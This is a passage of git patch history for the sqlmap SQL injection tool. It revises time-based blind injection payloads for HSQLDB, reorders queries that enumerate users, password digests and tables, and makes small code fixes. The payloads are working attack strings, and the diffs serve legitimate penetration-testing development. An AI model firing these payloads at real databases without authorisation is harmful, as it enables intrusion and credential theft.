+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</payload>
         </request>
         <response>
             <time>[DELAYED]</time>

From af21fc513d3fa5736dfbecb618a768c12dad4b2a Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 3 Sep 2014 21:39:38 +0200
Subject: [PATCH 011/492] Bug fix for HSQLDB (some queries were runnable on
 MySQL)

---
 xml/payloads.xml | 56 ++++++++++++++++++++++++------------------------
 1 file changed, 28 insertions(+), 28 deletions(-)

diff --git a/xml/payloads.xml b/xml/payloads.xml
index d3bdc7419..8367359bf 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -2314,9 +2314,9 @@ Formats:
         <risk>0</risk>
         <clause>0</clause>
         <where>1</where>
-        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000) END</vector>
+        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>
         <request>
-            <payload>;CALL REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000)</payload>
+            <payload>;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL)</payload>
             <comment>--</comment>
         </request>
         <response>
@@ -2335,9 +2335,9 @@ Formats:
         <risk>0</risk>
         <clause>0</clause>
         <where>1</where>
-        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000) END</vector>
+        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>
         <request>
-            <payload>;CALL REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000)</payload>
+            <payload>;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
             <comment>--</comment>
         </request>
         <response>
@@ -2823,9 +2823,9 @@ Formats:
         <risk>2</risk>
         <clause>1,2,3</clause>
         <where>1</where>
-        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END</vector>
+        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
         <request>
-            <payload>AND '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)</payload>
+            <payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>
         </request>
         <response>
             <time>[SLEEPTIME]</time>
@@ -2843,9 +2843,9 @@ Formats:
         <risk>2</risk>
         <clause>1,2,3</clause>
         <where>1</where>
-        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END</vector>
+        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
         <request>
-            <payload>AND '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)</payload>
+            <payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>
             <comment>--</comment>
         </request>
         <response>
@@ -2864,9 +2864,9 @@ Formats:
         <risk>2</risk>
         <clause>1,2,3</clause>
         <where>1</where>
-        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
+        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
         <request>
-            <payload>AND '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000)</payload>
+            <payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
         </request>
         <response>
             <time>[SLEEPTIME]</time>
@@ -2884,9 +2884,9 @@ Formats:
         <risk>2</risk>
         <clause>1,2,3</clause>
         <where>1</where>
-        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
+        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
         <request>
-            <payload>AND '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000)</payload>
+            <payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
             <comment>--</comment>
         </request>
         <response>
@@ -3124,9 +3124,9 @@ Formats:
         <risk>2</risk>
         <clause>1,2,3</clause>
         <where>1</where>
-        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END</vector>
+        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
         <request>
-            <payload>OR '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)</payload>
+            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>
         </request>
         <response>
             <time>[SLEEPTIME]</time>
@@ -3144,9 +3144,9 @@ Formats:
         <risk>2</risk>
         <clause>1,2,3</clause>
         <where>1</where>
-        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END</vector>
+        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
         <request>
-            <payload>OR '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)</payload>
+            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>
             <comment>--</comment>
         </request>
         <response>
@@ -3165,9 +3165,9 @@ Formats:
         <risk>2</risk>
         <clause>1,2,3</clause>
         <where>1</where>
-        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
+        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
         <request>
-            <payload>OR '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000)</payload>
+            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
         </request>
         <response>
             <time>[SLEEPTIME]</time>
@@ -3185,9 +3185,9 @@ Formats:
         <risk>2</risk>
         <clause>1,2,3</clause>
         <where>1</where>
-        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
+        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
         <request>
-            <payload>OR '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000)</payload>
+            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
             <comment>--</comment>
         </request>
         <response>
@@ -3524,9 +3524,9 @@ Formats:
         <risk>2</risk>
         <clause>1,2,3</clause>
         <where>1</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
         <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>
         </request>
         <response>
             <time>[SLEEPTIME]</time>
@@ -3544,9 +3544,9 @@ Formats:
         <risk>2</risk>
         <clause>1,2,3</clause>
         <where>1</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector>
         <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</payload>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</payload>
         </request>
         <response>
             <time>[SLEEPTIME]</time>
@@ -3744,9 +3744,9 @@ Formats:
         <risk>2</risk>
         <clause>2,3</clause>
         <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
         <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>
             <comment>--</comment>
         </request>
         <response>
@@ -3765,9 +3765,9 @@ Formats:
         <risk>2</risk>
         <clause>2,3</clause>
         <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</vector>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</vector>
         <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</payload>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</payload>
         </request>
         <response>
             <time>[DELAYED]</time>

From 112a0cb1ae19146bb83f23588ea8529be9037eed Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 3 Sep 2014 21:49:30 +0200
Subject: [PATCH 012/492] Patch for output directory (using unicode for
 international support)

---
 lib/core/common.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 573d28bac..0ac8eee6b 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1051,8 +1051,8 @@ def setPaths():
     paths.SQLMAP_UDF_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "udf")
     paths.SQLMAP_XML_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "xml")
     paths.SQLMAP_XML_BANNER_PATH = os.path.join(paths.SQLMAP_XML_PATH, "banner")
-    paths.SQLMAP_OUTPUT_PATH = paths.get("SQLMAP_OUTPUT_PATH", os.path.join(os.path.expanduser("~"), ".sqlmap", "output"))
 
+    paths.SQLMAP_OUTPUT_PATH = getUnicode(paths.get("SQLMAP_OUTPUT_PATH", os.path.join(os.path.expanduser("~"), ".sqlmap", "output")), system=True)
     paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump")
     paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files")
 

From bbf0be1f8d46d799eab24271925ec0946ac6aaef Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 3 Sep 2014 22:09:12 +0200
Subject: [PATCH 013/492] Bug fix (Issue #813)

---
 lib/request/connect.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/request/connect.py b/lib/request/connect.py
index 2bc90c777..021cdb196 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -385,7 +385,7 @@ class Connect(object):
 
             conn = urllib2.urlopen(req)
 
-            if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and conf.authType == AUTH_TYPE.BASIC:
+            if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and conf.authType.lower() == AUTH_TYPE.BASIC.lower():
                 kb.authHeader = getRequestHeader(req, HTTP_HEADER.AUTHORIZATION)
 
             if not kb.proxyAuthHeader and getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION):

From b1467f4c1fb66cc8f14110c59cc75f823e1eff1d Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 3 Sep 2014 23:09:10 +0200
Subject: [PATCH 014/492] Minor update

---
 plugins/dbms/hsqldb/fingerprint.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/plugins/dbms/hsqldb/fingerprint.py b/plugins/dbms/hsqldb/fingerprint.py
index 3d082c52a..bd3e0f6f7 100644
--- a/plugins/dbms/hsqldb/fingerprint.py
+++ b/plugins/dbms/hsqldb/fingerprint.py
@@ -134,7 +134,7 @@ class Fingerprint(GenericFingerprint):
 
             return True
         else:
-            warnMsg = "the back-end DBMS is not %s or is < 1.7.2" % DBMS.HSQLDB
+            warnMsg = "the back-end DBMS is not %s or version is < 1.7.2" % DBMS.HSQLDB
             logger.warn(warnMsg)
 
             return False

From 055b759145727ab13496d485ed250401b8ac722e Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 3 Sep 2014 23:13:57 +0200
Subject: [PATCH 015/492] Minor update

---
 lib/core/option.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/option.py b/lib/core/option.py
index 6c8c30675..5b5fec0cf 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -876,7 +876,7 @@ def _setDBMS():
 
     if conf.dbms not in SUPPORTED_DBMS:
         errMsg = "you provided an unsupported back-end database management "
-        errMsg += "system. The supported DBMS are %s. " % ', '.join([_ for _ in DBMS_DICT])
+        errMsg += "system. Supported DBMSes are as follows: %s. " % ', '.join(sorted(_ for _ in DBMS_DICT))
         errMsg += "If you do not know the back-end DBMS, do not provide "
         errMsg += "it and sqlmap will fingerprint it for you."
         raise SqlmapUnsupportedDBMSException(errMsg)

From 53d0d5bf8b42a519e97d9a38d9881fd94d0e35e1 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 8 Sep 2014 14:33:13 +0200
Subject: [PATCH 016/492] Minor update (adding a warning message about
 potential dropping of requests because of protection mechanisms involved)

---
 lib/controller/checks.py | 3 ++-
 lib/core/option.py       | 1 +
 lib/request/connect.py   | 2 ++
 3 files changed, 5 insertions(+), 1 deletion(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index d6a403afc..c8af38cdf 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -112,7 +112,7 @@ def checkSqlInjection(place, parameter, value):
                 kb.extendTests = [] if readInput(msg, default='Y').upper() != 'Y' else ([conf.dbms])
 
             title = test.title
-            stype = test.stype
+            kb.testType = stype = test.stype
             clause = test.clause
             unionExtended = False
 
@@ -1175,6 +1175,7 @@ def identifyWaf():
         infoMsg = "no WAF/IDS/IPS product has been identified"
         logger.info(infoMsg)
 
+    kb.testType = None
     kb.testMode = False
 
     return retVal
diff --git a/lib/core/option.py b/lib/core/option.py
index 5b5fec0cf..fa1029a58 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1741,6 +1741,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
     kb.technique = None
     kb.testMode = False
     kb.testQueryCount = 0
+    kb.testType = None
     kb.threadContinue = True
     kb.threadException = False
     kb.tableExistsChoice = None
diff --git a/lib/request/connect.py b/lib/request/connect.py
index 021cdb196..99e6fa07b 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -533,6 +533,8 @@ class Connect(object):
             elif "forcibly closed" in tbMsg:
                 warnMsg = "connection was forcibly closed by the target URL"
             elif "timed out" in tbMsg:
+                if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED):
+                    singleTimeWarnMessage("there is a possibility that the target (or WAF) is dropping 'suspicious' requests")
                 warnMsg = "connection timed out to the target URL"
             elif "URLError" in tbMsg or "error" in tbMsg:
                 warnMsg = "unable to connect to the target URL"

From bfc8ab0e3513394f8b3a102e89fac47f8768ba90 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 8 Sep 2014 14:48:31 +0200
Subject: [PATCH 017/492] Language update

---
 lib/controller/checks.py | 2 +-
 lib/request/connect.py   | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index c8af38cdf..d19a32d31 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -104,7 +104,7 @@ def checkSqlInjection(place, parameter, value):
                     if kb.extendTests is None:
                         _ = (Format.getErrorParsedDBMSes() if Backend.getErrorParsedDBMSes() else kb.heuristicDbms)
                         msg = "do you want to include all tests for '%s' " % _
-                        msg += "extending provided level (%d) and risk (%s)? [Y/n]" % (conf.level, conf.risk)
+                        msg += "extending provided level (%d) and risk (%s) values? [Y/n]" % (conf.level, conf.risk)
                         kb.extendTests = [] if readInput(msg, default='Y').upper() != 'Y' else (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms])
             elif kb.extendTests is None and conf.level < 5 and conf.risk < 3:
                 msg = "do you want to include all tests for '%s' " % conf.dbms
diff --git a/lib/request/connect.py b/lib/request/connect.py
index 99e6fa07b..2eab46815 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -858,7 +858,7 @@ class Connect(object):
                 if deviation > WARN_TIME_STDEV:
                     kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE
 
-                    warnMsg = "there is considerable lagging "
+                    warnMsg = "considerable lagging has been detected "
                     warnMsg += "in connection response(s). Please use as high "
                     warnMsg += "value for option '--time-sec' as possible (e.g. "
                     warnMsg += "10 or more)"

From 90869244fdd7e11e6d570377879caad8ca8d24b4 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 9 Sep 2014 16:19:38 +0200
Subject: [PATCH 018/492] Minor update

---
 xml/queries.xml | 18 +++++++++---------
 1 file changed, 9 insertions(+), 9 deletions(-)

diff --git a/xml/queries.xml b/xml/queries.xml
index 701b57d7e..521bef313 100644
--- a/xml/queries.xml
+++ b/xml/queries.xml
@@ -674,44 +674,44 @@
         <is_dba query="SELECT ADMIN FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE USER=CURRENT_USER"/>
         <check_udf/>
         <users>
-            <inband query="SELECT user FROM INFORMATION_SCHEMA.SYSTEM_USERS"/>
             <!-- LIMIT is needed at start for v1.7 this gets mangled unless no-cast is used -->
             <blind query="SELECT LIMIT %d 1 DISTINCT(user) FROM INFORMATION_SCHEMA.SYSTEM_USERS" count="SELECT COUNT(DISTINCT(user)) FROM INFORMATION_SCHEMA.SYSTEM_USERS"/>
+            <inband query="SELECT user FROM INFORMATION_SCHEMA.SYSTEM_USERS"/>
         </users>
         <passwords>
             <!-- Passwords only shown in later versions &gt;=2.0  -->
-            <inband query="SELECT user_name,password_digest FROM INFORMATION_SCHEMA.SYSTEM_USERS" condition="user_name"/>
             <blind query="SELECT LIMIT %d 1 DISTINCT(password_digest) FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE user_name='%s'" count="SELECT COUNT(DISTINCT(password_digest)) FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE user_name='%s'"/>
+            <inband query="SELECT user_name,password_digest FROM INFORMATION_SCHEMA.SYSTEM_USERS" condition="user_name"/>
         </passwords>
         <privileges/>
         <roles/>
         <dbs>
-            <inband query="SELECT table_schem FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS" />
             <blind query="SELECT LIMIT %d 1 DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS" count="SELECT COUNT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS"/>
+            <inband query="SELECT table_schem FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS" />
         </dbs>
         <tables>
-            <inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES" condition="table_schem"/>
             <blind query="SELECT LIMIT %d 1 table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s' " count="SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s'"/>
+            <inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES" condition="table_schem"/>
         </tables>
         <columns>
-            <inband query="SELECT column_name,type_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s'" condition="column_name"/>
             <blind query="SELECT column_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s'" query2="SELECT column_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'" count="SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
+            <inband query="SELECT column_name,type_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s'" condition="column_name"/>
         </columns>
         <dump_table>
-            <inband query="SELECT %s FROM %s.%s ORDER BY %s"/>
             <blind query="SELECT LIMIT %d 1 %s FROM %s.%s ORDER BY %s " count="SELECT COUNT(*) FROM %s.%s"/>
+            <inband query="SELECT %s FROM %s.%s ORDER BY %s"/>
         </dump_table>
         <search_db>
-            <inband query="SELECT table_schem FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS WHERE %s" condition="table_schem"/>
             <blind query="SELECT DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS WHERE %s" count="SELECT COUNT(DISTINCT(table_schem)) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS WHERE %s" condition="table_schem"/>
+            <inband query="SELECT table_schem FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS WHERE %s" condition="table_schem"/>
         </search_db>
         <search_table>
-            <inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE %s" condition="table_name" condition2="table_schem"/>
             <blind query="SELECT DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE %s" count="SELECT COUNT(DISTINCT(table_schem)) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE %s" condition="table_name" condition2="table_schem"/>
+            <inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE %s" condition="table_name" condition2="table_schem"/>
         </search_table>
         <search_column>
-            <inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s" condition="column_name" condition2="table_schem" condition3="table_name"/>
             <blind query="SELECT DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s"  count="SELECT COUNT(DISTINCT(table_schem)) FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s" condition="column_name" condition2="table_schem" condition3="table_name"/>
+            <inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s" condition="column_name" condition2="table_schem" condition3="table_name"/>
         </search_column>
     </dbms>
 </root>

From ae8c12c9c3166fca325aac201c5778c42dd03c80 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 9 Sep 2014 16:22:13 +0200
Subject: [PATCH 019/492] Fix for an Issue #818

---
 plugins/dbms/hsqldb/enumeration.py | 10 ++++++++++
 1 file changed, 10 insertions(+)

diff --git a/plugins/dbms/hsqldb/enumeration.py b/plugins/dbms/hsqldb/enumeration.py
index 43122d61f..c3b9f31e7 100644
--- a/plugins/dbms/hsqldb/enumeration.py
+++ b/plugins/dbms/hsqldb/enumeration.py
@@ -30,3 +30,13 @@ class Enumeration(GenericEnumeration):
             kb.data.banner = unArrayizeValue(inject.getValue(query, safeCharEncode=True))
 
         return kb.data.banner
+
+    def getPrivileges(self, *args):
+        warnMsg = "on HSQLDB it is not possible to enumerate the user privileges"
+        logger.warn(warnMsg)
+
+        return {}
+
+    def getHostname(self):
+        warnMsg = "on HSQLDB it is not possible to enumerate the hostname"
